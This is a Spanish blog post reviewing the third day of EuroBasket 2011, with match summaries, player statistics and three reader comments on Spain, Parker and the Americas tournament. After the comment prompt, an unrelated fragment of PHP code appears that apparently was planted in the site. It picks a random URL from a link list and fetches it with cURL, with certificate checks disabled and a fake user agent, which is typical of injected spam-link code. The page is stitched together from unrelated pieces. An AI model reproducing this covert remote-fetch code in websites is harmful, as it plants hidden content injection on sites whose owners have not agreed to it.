EuroNBAsket 2011: 3ª Jornada

03 de September de 2011 por TheDeerHunter

Tercera jornada disputada ayer y hoy. Comienzan a aclararse ciertas tramas pero se complican otras. El peso NBA, de momento, está siendo puntual y relativo. Parece que el lockout no va a ser el factor que haría de éste el mejor eurobasket de la historia.

Grupo A

España 86 – Gran Bretaña 69: La ÑBA sigue sin deslumbrar pero ayer les vimos un grado mejor, con un inmenso Marc y la defensa de Rudy sobre Deng. Por contra, Navarro accidentalmente flojo y de Calderón, Ibaka y Rubio apenas nos llega algún destello.

Destacados NBA: Marc Gasol 18 ptos, 11 reb, 5 asis, 1 tap, 2 rob; Pau Gasol 21 ptos, 6 reb, 2 asis, 2 tap, 1 rob (22 min)

Portugal 73 – Polonia 81: Se confirma que los vecinos son de largo lo peor del grupo. Un juego interior como el de Polonia les sacó 14 rebotes de diferencia. Los cabreos en la banda de Mario Palma son o de muy buen actor o de muy idiota. Dejo abierto el debate de si los lusos son la peor selección del campeonato o lo es Bélgica.

Destacado: Lukasz Koszarek 18 ptos, 4 asis, 3 reb, 2 rob

Turquía 68 – Lituania 75: Dos selecciones de roca en una muestra del ambiente que les espera a cada visitante. Los turcos tomaron de su propia medicina. Partido a cara de perro, de pala y trinchera, pesado de tanta carga táctica. La balanza se inclina por mínimos detalles. Los locales se mostraron con mayor fondo de armario y variedad de recursos.

Destacados NBA: Darius Songaila 12 ptos, 5 reb, 2 asis (22 min)
Omar Asik 11 ptos, 13 reb, 2 asis; Ersan Ilyasova 20 ptos, 4 reb, 1 asis

Grupo B

Serbia 89 – Israel 80: Sufrieron de lo lindo los ex-yugoslavos, por detrás hasta el último cuarto. Ivkovic no da con la tecla defensiva y a su selección le está costando arrancar cada partido. Al menos ha encontrando en la pareja Krstic-Savanovic su referente habitual. Muy digna actuación de Halperin y los suyos.

Destacados: Nenad Krstic 23 ptos, 3 reb, 2 asis; Dusko Savanovic 19 ptos, 5 reb, 2 tap, 1 asis

Letonia 62 – Italia 71: Sensacional Bargnani en modo reivindicación echándose al equipo a la espalda. A ver si abre el camino a Gallinari y Bellinelli que siguen a lo suyo (3 de 21 entre los dos angelitos) Los letones le echaron narices y podrían haberle dado la puntilla a sus rivales, pero ayer no tocaba acierto en el tiro, ni siquiera en los libres. Ayer Blums tiró por tierra sus promedios.

Destacado NBA: Andrea Bargnani 36 ptos, 7 reb, 3 tap, 1 rob
Destacado resto: Rihard Kuksiks 19 ptos, 6 reb, 2 asis

Francia 76 – Alemania 65: Implacable Parker lanzado hacia el MVP. 3 de 3 jornadas donde ha sido el mejor. Ayer se superó a si mismo. Nowitzki demasiado solo al no poder Kaman escapar al efecto Noah. Así visto parece un prometedor cruce… aunque ya sabemos lo que significa un cara o cruz contra Robin Hood en este deporte.

Destacado NBA: Tony Parker 32 ptos, 6 asis, 4 reb, 2 rob

Grupo C

Finlandia 92 – Bosnia-Herzegovina 64: Menudo palizón. Tocaba la de arena para la bipolar selección de Teletovic. Pero no fue una ruleta rusa desde el triple como inicialmente podríamos pensar. Fue un baño completo en casi todas las categorías estadísticas de un conjunto tocado por las musas. Algo huele muy a podrido en B-H y este es un paso importantísimo para quedarse fuera. Nadie lo hubiera dicho hace unas horas.

Destacados: Mikko Koivisto 17 ptos, 3 reb, 2 asis (20 min)
Henry Domercant 25 ptos, 3 reb, 1 asis

Grecia 58 – Macedonia 72: No diremos que es increíble que Grecia haya tropezado a estas alturas. Más bien parece lo más lógico visto lo visto. Macedonia empieza a confirmar que no está aquí de casualidad ni mucho menos de comparsa. Particularmente me sigue extrañando que un interior del nivel de Koufos (por mencionar uno) se juegue 1 tiro mientras Bourousis 11 (anotando 2), Zisis los mismos (anotando 3) y Fotsis 13. No parecen el Big Three de Miami. Desquiciantes los helenos en ataque y en defensa y no apostaría mi dinero por ellos en ningún cruce.

Destacado: Bo McCalebb 27 ptos, 4 reb, 4 asis, 1 rob

Croacia 87 – Montenegro 81: Como le ha cambiado la cara en un sólo día a los croatas. Esta decisiva victoria se ha cimentado sobre el talento y los elevados hombros de Ante Tomic y el pequeño e irregular Popovic en uno de esos momentos “hot” que le vienen. No encontraron los montenegrinos a sus referentes habituales. Salieron al rescate Dragicevic y Jeretin pero faltó un punto de claridad que sí tuvieron sus rivales para amarrar el resultado.

Destacados: Ante Tomic 26 ptos, 8 reb, 4 asis, 1 rob; Marko Popovic 23 ptos (7/11 3p) 4 asis, 1 reb

Grupo D

Ukrania 67 – Bulgaria 56: Por fin se estrenó Ukrania. Rocoso equipo pero con grandes dificultades de ver aro. Hoy lo han visto por fin y poca resistencia les ha opuesto una Bulgaria lamentable.

Destacado: Stiven Bertt 17 ptos, 4 asis, 2 reb, 1 rob

Eslovenia 87 – Georgia 75: Importantísima victoria para Eslovenia, cuando lo más lógico hubiera sido la derrota. Los Georgianos anotaron más de un 55%, dejando a sus rivales en poco más de un 35% y dominando los aros. Ellos solos se condenaron, perdiendo 21 balones, lanzando un 12 de 20 en tiros libres y mostrándose incapaces de defender el perímetro, con un 15 de 35 triplazos para sus rivales.

Destacados: Jaka Lakovic 22 ptos (5/9 3p) 4 asis, 1 reb, 1 rob; Zazo Osbolt 21 ptos (4/10 3p) 4 reb, 2 asis, 4 rob

Rusia 79 – Bélgica 58: Otro paseo para Rusia, pudiendo hacer rotaciones y dejándose lucir a los menos habituales. Bélgica es una selección muy infame para poder hacer ningún tipo de lectura frente a ellos.

Destacado: Vitali Fridzon 22 ptos, 3 reb, 3 asis, 3 rob

Comenta

3 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Sin duda, ante la baja de Hervelle, Bélgica es la puta gracia del torneo. En ese top están Bulgaria y Portugal, que dan vergüencita ajena, pero por lo menos luchan los partidos hasta el final. Eslovenia y Croacia ayer tuvieron suerte de que sus rivales demostraran inocencia como bebés de cinco años. Tango Georgia como Montenegro no saben que defenderles en zona a estos chicos es un suicidio en toda regla. Claro, así Lakovic, Ozbolt, Popovic y demás vasca son más felices que la kika. Inocencia en ambos casos, sobre todo Georgia, que sí que pudo ganarle realmente el partido. Ahí a dos puntines mientras Eslovenia fallaba y fallaba, y los parientes lejanos del primo Larry no sabían qué hacer ante la posiblidad de ganar. Por eso perdieron.

    Bueno, lo de Grecia es de chiste. Han tenido suerte de caer en un grupo de mierda, y a nada que hagan pues estarán en cuartos de final, ya que pueden acumular todavía las dos victorias para la segunda fase. Pero es la peor Grecia que he visto en mi vida.

    Parker, sin duda, dueño y señor del torneo. La única duda que me queda es qué podrá hacer ante Teodosic y qué podrá hacer ante los bases españoles, que se le atragantan. Si sigue en modo soy Dios, ojito con Francia que puede aspirar a todo.

    Por cierto, ojalá hoy pierda Francia contra Italia esta tarde, porque veríamos lo que puede ser un grupo suicida todos persiguiendo la clasificación. Italia empataría a Alemania, que juega contra Serbia y palmará, previsiblemente. Francia giñaos, porque 3-1 y les quedaría Serbia, que querrá amarrar sus dos victorias para la segunda fase, e Italia jugando mañana contra Israel y a meter basketaverage de por medio. Jeje, se puede poner divertido si los italianos hacen esa tontería, los Alemanes también a reventar a Letonia y Francia rezando contra Serbia. Parece improbable, pero puede suceder. Italia no tiene nada que perder y tiene calidad de sobra para hacer una tontería como cargarse a Francia Me encantaría y así veríamos algo de emoción en esta primera fase, a parte de la que nos ofrecerá el Ucrania-Georgia o el Finlandia-Macedonia. Quien gane en estos partidos tiene muchas opciones de pasar a segunda fase.

    Lo dicho, para mí Bélgica sí es la coña del Eurobasket, y voy más allá, Lituania gana a España esta tarde. Segundo debate abierto. ¿Cómo podemos recibir 77 puntos de media ante Polonia, Portugal y Gran Bretaña y creernos aspirantes a algo? Esos equipos antes de que llegara Scariolo a la selección, nos habrían metido 50 puntos. Por tanto, veo hoy a Jasaitis, Kalnietis, Kaukenas y Jasikevicius jugándose un All-Star de triples. También se admiten apuestas en torno a cuantos triples nos meterá Lituania hoy. Yo creo que de 15 no bajan.

      Citar

  2. Nacho dice:
    #2

    ¡Hombre Sancho! Nos pueden meter los puntos que quieran mientras nosotros metamos más. Es la ley del basquet (bueno Popovich, Malikovic y otros discreparían conmigo) El problema de España es en gran parte Scariolo, y el miedo de los segundones (seguramente inspirado por el propio entrenador) Pero sigue siendo de largo la mejor selección del torneo. Se puede perder hoy, y no debería pasar nada. Pero no creo que suceda. España asegura más de 50 puntos de su juego interior, y a poco que Navarro enchufe lo que le toca, y los bases metan algo, no veo a ninguna selección que nos gane (sobre todo e lospartidos de verdad)
    De todas formas, Scariolo se lo tendría que mirar y abandonar la selección (y con el oro quedaría muy bien) porwque le viene grande.
    Otra cosa, he visto momentos de Pau que no había visto nunca. Jugarse las bolas en cuanto le llegan porque es el jefe. Pensar más en él que en el juego de equipo. Y esto, si se hace sin abusar (y Pau es listo para hacerlo) es bueno para todos, para España, y para él. (por cierto él, que será el MVP del torneo, Porque Francia y Parker, deben demostrar una consistencia que nunca han tenido, y les llegan seguidas Serbia, Turquía, Lituania y España. Con el aperitivo de Italia, ahí es nada,

      Citar

  3. German dice:
    #3

    Con los resultados de hoy se ha puesto muy picante el torneo, quien diria que Turquia podria quedar afuera en la primera fase! Polonia aun sin Gortat esta dando mucha pelea.

    España ha aparecido cuando es necesario, impresionante primera mitad, jugando asi es medalla de oro tranquilamente, han hecho todo bien.

    El Grupo D es una loteria y atencion que Croacia tambien puede quedar eliminado pronto…

    Por America las cosas estan mas previsibles, solo en el Grupo A se dieron algunas “sorpresas” como la caida de Brasil ante Dominicana (79-74), el conjunto brasileño no esta muy solido todavia, muestra de ello fue la apretada victoria el dia siguiente (93-83) ante Cuba, el rival mas debil del grupo.
    Venezuela cumplio el tramite ante los cubanos (106-69) y luego dio el golpe ante Canada en el mejor partido del torneo (103-98 en una prorroga donde se olvidaron de defender), previamente los canadienses habian vencido a los dominicanos 73-72.

    En el grupo B Argentina tuvo su primer examen ante un seleccionado fuerte como Puerto Rico, luego de una floja primera mitad (36-38) reacciono con un tercer cuarto brillante ajustando mucho la defensa con una gran tarea de Ginobili, Prigioni y Jasen, ese parcial fue de 28-14 para los argentinos que encaminaron el partido al 81-74 final. Gran partido de Arroyo en el visitante (24 pts) y bueno tambien lo de Daniel Santiago bajo el aro, flojo Barea.
    Al dia siguiente el extraño combinado panameño (vino al torneo sin un solo base!!) dio mucha pelea y planto cara al equipo local apoyados en un excelente juego interno con Lloreda y principalmente Garces (19 pts y 17 rebotes para el). Panama se fue al descanso arriba por un punto (39-38) pero otra vez fue el tercer cuarto el momento donde resurgio Argentina, no tanto con la defensa sino con el tiro exterior que comenzo a entrar. Otra vez gano por 14 el tercer periodo, el resultado final fue 90-71.
    Los otros partidos fueron todos dentro de la logica, Puerto Rico vencio 74-64 a Uruguay y estos a Panama (77-61) y a Paraguay (79-66) que quedo eliminado tras caer 89-86 frente a los panameños.

    Mañana comienza la parte fuerte del torneo con los siguientes partidos:
    Republica Dominicana-Panama
    Venezuela-Puerto Rico
    Argentina-Canada
    Brasil-Uruguay

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>